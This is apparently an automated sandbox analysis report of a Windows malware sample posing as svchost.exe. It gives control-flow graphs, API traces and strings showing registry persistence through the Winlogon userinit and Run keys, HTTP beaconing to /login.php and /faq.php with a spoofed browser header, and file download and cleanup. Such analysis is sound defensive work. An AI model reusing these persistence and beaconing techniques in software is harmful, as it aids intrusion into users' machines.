                                                                                                                                                                                                                    control_flow_graph 433 2c83620-2c83665 memset 434 2c8366b-2c8366e 433->434 435 2c839a2-2c839aa 433->435 434->435 436 2c83674-2c83677 434->436 437 2c83679-2c8367b 436->437 438 2c836d1-2c836ee InternetOpenA 436->438 439 2c83681-2c8368f 437->439 440 2c839ad-2c839b5 438->440 441 2c836f4-2c8370c InternetConnectA 438->441 439->439 442 2c83691-2c83693 439->442 443 2c8398f-2c8399f InternetCloseHandle 441->443 444 2c83712-2c8371a 441->444 445 2c836a0-2c836b1 442->445 446 2c8371c 444->446 447 2c83721-2c8373e HttpOpenRequestA 444->447 448 2c836b3 445->448 449 2c836b5-2c836bc 445->449 446->447 450 2c83744-2c8374e 447->450 451 2c83985-2c8398c InternetCloseHandle 447->451 448->449 449->445 452 2c836be-2c836cc call 2c86c40 449->452 453 2c83750-2c83753 450->453 454 2c83764-2c83776 HttpAddRequestHeadersA 450->454 451->443 452->438 453->454 455 2c83755-2c83762 HttpAddRequestHeadersA 453->455 456 2c837a8-2c837bb HttpSendRequestA 454->456 457 2c83778-2c837a6 _snprintf HttpAddRequestHeadersA 454->457 455->454 459 2c8397b-2c83982 InternetCloseHandle 456->459 460 2c837c1-2c837db HttpQueryInfoA 456->460 457->456 459->451 460->459 461 2c837e1-2c837e8 460->461 461->459 462 2c837ee-2c83814 CreateFileA 461->462 462->459 463 2c8381a 462->463 464 2c83820-2c83834 GetProcessHeap HeapAlloc 463->464 465 2c8383a-2c83867 memset InternetReadFile 464->465 466 2c838c3-2c838c5 464->466 467 2c83869-2c8386e 465->467 468 2c838a7-2c838b5 GetProcessHeap HeapValidate 465->468 469 2c838ea-2c838fe call 2c76570 466->469 470 2c838c7-2c838db GetHandleInformation 466->470 467->468 472 2c83870-2c83894 WriteFile GetProcessHeap HeapValidate 467->472 468->466 473 2c838b7-2c838bd GetProcessHeap HeapFree 468->473 478 2c83978 469->478 479 2c83900-2c8390a 469->479 470->469 474 2c838dd-2c838e1 470->474 472->464 477 2c83896-2c838a2 GetProcessHeap HeapFree 472->477 473->466 474->469 475 2c838e3-2c838e4 CloseHandle 474->475 475->469 477->464 478->459 480 2c83910-2c8391e 479->480 480->480 481 2c83920 480->481 482 2c83922-2c83933 481->482 483 2c83935 482->483 484 2c83937-2c8393e 482->484 483->484 484->482 485 2c83940-2c83957 call 2c86c40 call 2c764d0 484->485 489 2c8395c-2c8396a GetProcessHeap HeapValidate 485->489 489->478 490 2c8396c-2c83972 GetProcessHeap HeapFree 489->490 490->478
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C83655
                                                                                                                                                                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),02C76406,00000000,00000000,04000000), ref: 02C836E1
                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02C836FF
                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02C83731
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02C83762
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02C83771
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C8378E
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02C837A6
                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000004,00000000), ref: 02C837B3
                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,20000013,02C76406,00000004,02C76406), ref: 02C837D3
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(02C76406,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C83809
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00001010), ref: 02C83827
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C8382A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C83842
                                                                                                                                                                                                                    • InternetReadFile.WININET(?,00000000,00001000,00000001), ref: 02C8385F
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02C83880
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83889
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C8388C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83899
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C8389C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C838AA
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C838AD
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C838BA
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C838BD
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000001), ref: 02C838D3
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C838E4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • POST, xrefs: 02C8371C, 02C8372F
                                                                                                                                                                                                                    • GET, xrefs: 02C83712
                                                                                                                                                                                                                    • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02C836DC
                                                                                                                                                                                                                    • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02C8377D
                                                                                                                                                                                                                    • Content-Type: application/x-www-form-urlencoded, xrefs: 02C8375C
                                                                                                                                                                                                                    • Referer: http://www.google.com, xrefs: 02C8376B
                                                                                                                                                                                                                    • HTTP/1.0, xrefs: 02C83729
                                                                                                                                                                                                                    • 6b8e26743fcf62a2, xrefs: 02C83778
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Http$ProcessRequest$FileHeadersInternet$FreeHandleOpenValidatememset$AllocCloseConnectCreateInfoInformationQueryReadSendWrite_snprintf
                                                                                                                                                                                                                    • String ID: 6b8e26743fcf62a2$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com
                                                                                                                                                                                                                    • API String ID: 1431876097-4291293516
                                                                                                                                                                                                                    • Opcode ID: abc092fa1e433f2f3166341539d231279637e4fbd7829c8ee8133a39af11538f
                                                                                                                                                                                                                    • Instruction ID: 5504d569ebac3d570b88e2c87a30457f6a10eee0940acfc8c6b47d78dcfd1f48
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: abc092fa1e433f2f3166341539d231279637e4fbd7829c8ee8133a39af11538f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACA1EB71A402987BEB11AF64DC89FEF776CEF88B19F0046A9F905E7180D7709A14CB61
                                                                                                                                                                                                                    Function 02C868B0 Relevance: 51.0, APIs: 24, Strings: 5, Instructions: 244registrymemorysynchronizationCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 685 2c868b0-2c868c2 686 2c868c5-2c868ca 685->686 686->686 687 2c868cc-2c868d3 686->687 688 2c868d9-2c868e6 PathFileExistsA 687->688 689 2c86ab7-2c86abf IsUserAnAdmin 687->689 688->689 692 2c868ec-2c8690b RegOpenKeyExA 688->692 690 2c86ad8-2c86ae8 689->690 691 2c86ac1-2c86ad6 689->691 693 2c86aed-2c86af5 RegOpenKeyExA 690->693 691->693 694 2c86a58-2c86a71 RegOpenKeyExA 692->694 695 2c86911-2c86935 RegQueryValueExA 692->695 696 2c86b4b-2c86b51 693->696 697 2c86af7-2c86b06 CreateEventA 693->697 694->689 700 2c86a73-2c86a7b 694->700 698 2c86a48-2c86a56 RegFlushKey 695->698 699 2c8693b-2c86955 GetProcessHeap HeapAlloc 695->699 697->696 701 2c86b08-2c86b1b RegNotifyChangeKeyValue 697->701 703 2c86ab1 RegCloseKey 698->703 699->698 702 2c8695b-2c86989 memset RegQueryValueExA StrStrIA 699->702 704 2c86a80-2c86a85 700->704 705 2c86b21-2c86b28 WaitForSingleObject 701->705 706 2c8698f-2c86991 702->706 707 2c86a26-2c86a3a GetProcessHeap HeapValidate 702->707 703->689 704->704 708 2c86a87-2c86ab0 RegSetValueExA RegFlushKey 704->708 705->705 709 2c86b2a-2c86b30 705->709 710 2c86994-2c86999 706->710 707->698 711 2c86a3c-2c86a42 GetProcessHeap HeapFree 707->711 708->703 712 2c86b3c-2c86b49 RegNotifyChangeKeyValue 709->712 713 2c86b32-2c86b37 call 2c92f90 709->713 710->710 714 2c8699b-2c8699d 710->714 711->698 712->705 713->712 716 2c8699f-2c869a4 714->716 717 2c869c1-2c869c6 714->717 716->717 719 2c869a6-2c869a9 716->719 718 2c869c8-2c869cd 717->718 718->718 720 2c869cf-2c869d1 718->720 721 2c869b0-2c869b6 719->721 722 2c869d4-2c869da 720->722 721->721 723 2c869b8-2c869be 721->723 722->722 724 2c869dc-2c869ed 722->724 723->717 725 2c869f0-2c869f6 724->725 725->725 726 2c869f8-2c86a04 725->726 727 2c86a07-2c86a0c 726->727 727->727 728 2c86a0e-2c86a20 RegSetValueExA 727->728 728->707
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe), ref: 02C868DE
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?), ref: 02C86907
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02C86927
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000010), ref: 02C86944
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C8694B
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8695F
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02C86979
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,C:\Windows\apppatch\svchost.exe), ref: 02C86981
                                                                                                                                                                                                                    • RegSetValueExA.KERNEL32(?,userinit,00000000,00000001,00000000,00000002), ref: 02C86A20
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C86A2F
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C86A32
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C86A3F
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C86A42
                                                                                                                                                                                                                    • RegFlushKey.ADVAPI32(?), ref: 02C86A4C
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F013F,?), ref: 02C86A6D
                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe), ref: 02C86A9D
                                                                                                                                                                                                                    • RegFlushKey.ADVAPI32(?), ref: 02C86AA7
                                                                                                                                                                                                                    • RegCloseKey.KERNEL32(?), ref: 02C86AB1
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C86AB7
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,?), ref: 02C86AED
                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C86AFC
                                                                                                                                                                                                                    • RegNotifyChangeKeyValue.KERNEL32(?,00000000,0000000F,00000000,00000001), ref: 02C86B19
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C86B24
                                                                                                                                                                                                                    • RegNotifyChangeKeyValue.ADVAPI32(?,00000000,0000000F,00000000,00000001), ref: 02C86B47
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HeapValue$OpenProcess$ChangeFlushNotifyQuery$AdminAllocCloseCreateEventExistsFileFreeObjectPathSingleUserValidateWaitmemset
                                                                                                                                                                                                                    • String ID: ,$C:\Windows\apppatch\svchost.exe$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                                    • API String ID: 2213373080-1283825033
                                                                                                                                                                                                                    • Opcode ID: bf019f43bef0af59052552b5b09ef3271221621f387e42b16880c8e3a12a44c3
                                                                                                                                                                                                                    • Instruction ID: 8822c7c67e2016f5214d1eb9464f0d1547cdcdbd9c47378666bae36805e27dd0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf019f43bef0af59052552b5b09ef3271221621f387e42b16880c8e3a12a44c3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C071D971E84245BBEB119B649C49FBBB76CDF84708F208694F941BB280DBB1DA05C7A0
                                                                                                                                                                                                                    Function 02C75C80 Relevance: 49.2, APIs: 25, Strings: 3, Instructions: 248memoryfileCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 729 2c75c80-2c75cbe memset call 2c839c0 732 2c75cc4-2c75cd8 call 2c76570 729->732 733 2c75f19-2c75f22 PathFileExistsA 729->733 739 2c75cde-2c75cf3 calloc * 2 732->739 740 2c75f18 732->740 735 2c75f24-2c75f26 733->735 736 2c75f38-2c75f3f 733->736 735->736 738 2c75f28-2c75f32 SetFileAttributesA DeleteFileA 735->738 738->736 741 2c75cf5-2c75cf6 exit 739->741 742 2c75cfc-2c75d06 calloc 739->742 740->733 741->742 743 2c75d0f-2c75d30 calloc 742->743 744 2c75d08-2c75d09 exit 742->744 745 2c75d32-2c75d33 exit 743->745 746 2c75d39-2c75d43 calloc 743->746 744->743 745->746 747 2c75d45-2c75d46 exit 746->747 748 2c75d4c-2c75d6d calloc 746->748 747->748 749 2c75d77-2c75d82 calloc 748->749 750 2c75d6f-2c75d71 exit 748->750 751 2c75d84-2c75d86 exit 749->751 752 2c75d8c-2c75db2 calloc 749->752 750->749 751->752 753 2c75db4-2c75db6 exit 752->753 754 2c75dbc-2c75dcb calloc 752->754 753->754 755 2c75dd5-2c75e18 call 2c719a0 * 3 call 2c71a10 754->755 756 2c75dcd-2c75dcf exit 754->756 764 2c75e1d-2c75e26 755->764 756->755 765 2c75e28-2c75e30 764->765 765->765 766 2c75e32-2c75e4b _strrev 765->766 767 2c75e50-2c75e55 766->767 767->767 768 2c75e57-2c75e66 767->768 769 2c75e7c-2c75e7e 768->769 770 2c75e68-2c75e6c 768->770 771 2c75e80-2c75e88 769->771 773 2c75ec3 769->773 770->771 772 2c75e6e-2c75e7a 770->772 774 2c75ebb-2c75ec1 771->774 775 2c75e8a-2c75e8d 771->775 772->769 772->770 776 2c75ec5-2c75f07 call 2c71850 * 4 GetProcessHeap HeapValidate 773->776 774->776 775->773 777 2c75e8f-2c75e99 775->777 790 2c75f15 776->790 791 2c75f09-2c75f0f GetProcessHeap HeapFree 776->791 777->774 779 2c75e9b-2c75e9e 777->779 779->773 782 2c75ea0-2c75eaa 779->782 782->774 784 2c75eac-2c75eaf 782->784 784->773 786 2c75eb1-2c75eb9 784->786 786->774 790->740 791->790
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C75CA0
                                                                                                                                                                                                                      • Part of subcall function 02C839C0: memset.MSVCRT ref: 02C839F2
                                                                                                                                                                                                                      • Part of subcall function 02C839C0: InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02C83A7E
                                                                                                                                                                                                                      • Part of subcall function 02C839C0: InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02C83A9F
                                                                                                                                                                                                                      • Part of subcall function 02C839C0: HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02C83AD5
                                                                                                                                                                                                                    • calloc.MSVCRT ref: 02C75CE7
                                                                                                                                                                                                                    • exit.MSVCRT ref: 02C75CF6
                                                                                                                                                                                                                    • calloc.MSVCRT ref: 02C75CFF
                                                                                                                                                                                                                    • exit.MSVCRT ref: 02C75D09
                                                                                                                                                                                                                    • calloc.MSVCRT ref: 02C75D27
                                                                                                                                                                                                                    • exit.MSVCRT ref: 02C75D33
                                                                                                                                                                                                                    • calloc.MSVCRT ref: 02C75D3C
                                                                                                                                                                                                                    • exit.MSVCRT ref: 02C75D46
                                                                                                                                                                                                                    • calloc.MSVCRT ref: 02C75D64
                                                                                                                                                                                                                    • exit.MSVCRT ref: 02C75D71
                                                                                                                                                                                                                    • calloc.MSVCRT ref: 02C75D7B
                                                                                                                                                                                                                    • exit.MSVCRT ref: 02C75D86
                                                                                                                                                                                                                    • calloc.MSVCRT ref: 02C75DA9
                                                                                                                                                                                                                    • exit.MSVCRT ref: 02C75DB6
                                                                                                                                                                                                                    • calloc.MSVCRT ref: 02C75DC0
                                                                                                                                                                                                                    • exit.MSVCRT ref: 02C75DCF
                                                                                                                                                                                                                    • _strrev.MSVCRT ref: 02C75E39
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C76406,?), ref: 02C75EFC
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C75EFF
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C75F0C
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C75F0F
                                                                                                                                                                                                                    • PathFileExistsA.SHLWAPI(02C76406,02C76406,/login.php,02C76406,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02C75F1A
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(02C76406,00000000,?,00000000,00000000), ref: 02C75F2B
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(02C76406,?,00000000,00000000), ref: 02C75F32
                                                                                                                                                                                                                      • Part of subcall function 02C76570: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C76596
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765B7
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765DD
                                                                                                                                                                                                                      • Part of subcall function 02C76570: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765E4
                                                                                                                                                                                                                      • Part of subcall function 02C76570: memset.MSVCRT ref: 02C765F4
                                                                                                                                                                                                                      • Part of subcall function 02C76570: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76616
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76622
                                                                                                                                                                                                                      • Part of subcall function 02C76570: HeapValidate.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76629
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76636
                                                                                                                                                                                                                      • Part of subcall function 02C76570: HeapFree.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C7663D
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7665D
                                                                                                                                                                                                                      • Part of subcall function 02C76570: CloseHandle.KERNEL32(00000000), ref: 02C7666E
                                                                                                                                                                                                                      • Part of subcall function 02C76570: IsBadWritePtr.KERNEL32(?,00000004), ref: 02C7667E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • /login.php, xrefs: 02C75CB1
                                                                                                                                                                                                                    • 6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9, xrefs: 02C75DDD
                                                                                                                                                                                                                    • 10001, xrefs: 02C75DFA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$callocexit$File$Process$memset$FreeHandleInternetOpenValidate$AllocateAttributesCloseConnectCreateDeleteExistsHttpInformationPathReadRequestSizeWrite_strrev
                                                                                                                                                                                                                    • String ID: /login.php$10001$6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9
                                                                                                                                                                                                                    • API String ID: 550513112-2761129557
                                                                                                                                                                                                                    • Opcode ID: 2a7eddcdeb8045a698a5e8522566253d47138d8247603723de7eecf209b64428
                                                                                                                                                                                                                    • Instruction ID: 0232dead3d0be3a74cf210bb2837edbe1b3ac61b181474ee5f9503a028576102
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a7eddcdeb8045a698a5e8522566253d47138d8247603723de7eecf209b64428
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76813870E402A5AFEB229F648C84BAFBFB8EF41344F044559ED45A7281D7B5DA04CBE1
                                                                                                                                                                                                                    Function 02C85590 Relevance: 49.2, APIs: 25, Strings: 3, Instructions: 242memorysleepfileCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 792 2c85590-2c855c3 memset call 2c732f0 795 2c855c6-2c855cb 792->795 795->795 796 2c855cd-2c855d7 795->796 797 2c855dd-2c855f9 GetProcessHeap HeapAlloc 796->797 798 2c8587f-2c85882 796->798 799 2c8587e 797->799 800 2c855ff-2c85612 memset GetTimeZoneInformation 797->800 799->798 801 2c85618-2c8561f call 2c83d90 800->801 804 2c85621-2c85633 Sleep call 2c83d90 801->804 805 2c85635-2c85643 801->805 804->805 807 2c8564c-2c8565b IsUserAnAdmin 805->807 808 2c85645 805->808 810 2c8565d 807->810 811 2c85664-2c8571a GetTickCount call 2c93d20 _snprintf GetTempPathA GetTempFileNameA SetFileAttributesA DeleteFileA 807->811 808->807 810->811 814 2c85720-2c85725 811->814 814->814 815 2c85727-2c8573b call 2c76240 814->815 818 2c8579a-2c857b9 call 2c839c0 815->818 819 2c8573d-2c8573f 815->819 825 2c857bb-2c857ce call 2c76570 818->825 826 2c85815-2c8581c call 2c83d90 818->826 821 2c85741-2c85743 819->821 822 2c85792-2c85794 819->822 824 2c85745-2c85749 821->824 822->818 827 2c8574b-2c8574d 824->827 828 2c85765-2c85767 824->828 838 2c857d0-2c857e9 call 2c84950 GetProcessHeap HeapValidate 825->838 839 2c857f7-2c85813 SetFileAttributesA DeleteFileA 825->839 840 2c8581e call 2c763b0 826->840 841 2c85823-2c85837 call 2c848b0 call 2c73430 826->841 830 2c8574f-2c85755 827->830 831 2c85761-2c85763 827->831 833 2c8576a-2c8576c 828->833 830->828 835 2c85757-2c8575f 830->835 831->833 833->818 837 2c8576e-2c85780 GetProcessHeap HeapValidate 833->837 835->824 835->831 837->822 842 2c85782-2c8578c GetProcessHeap HeapFree 837->842 838->839 849 2c857eb-2c857f1 GetProcessHeap HeapFree 838->849 839->841 840->841 851 2c85839-2c8584c 841->851 852 2c85872-2c85879 Sleep 841->852 842->822 849->839 853 2c85850-2c85857 Sleep call 2c73430 851->853 852->801 855 2c8585c-2c8585e 853->855 855->801 856 2c85864-2c8586b 855->856 856->853 857 2c8586d 856->857 857->801
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C855B1
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,-000000F0,?,00000000), ref: 02C855E7
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02C855EE
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C85603
                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(00000000,?,?,00000000), ref: 02C85612
                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 02C85626
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8564C
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02C8568A
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C856C6
                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 02C856DB
                                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02C856F3
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C85702
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 02C8570F
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C85771
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C85778
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C85785
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C8578C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,00000000,/faq.php,?,00000001,?,02CB7A90,00000001,00000000), ref: 02C857DE
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C857E1
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C857EE
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C857F1
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000,00000000,00000001,00000000,/faq.php,?,00000001,?,02CB7A90,00000001,00000000), ref: 02C85800
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 02C8580D
                                                                                                                                                                                                                    • Sleep.KERNEL32(?,00000000,/faq.php,?,00000001,?,02CB7A8C,00000001,00000000), ref: 02C85851
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: IsNetworkAlive.SENSAPI(02C763DD,00000000), ref: 02C83DA3
